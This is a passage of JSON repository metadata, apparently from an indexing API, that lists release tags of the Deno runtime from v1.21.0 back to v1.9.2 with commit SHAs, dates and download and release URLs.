9c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","h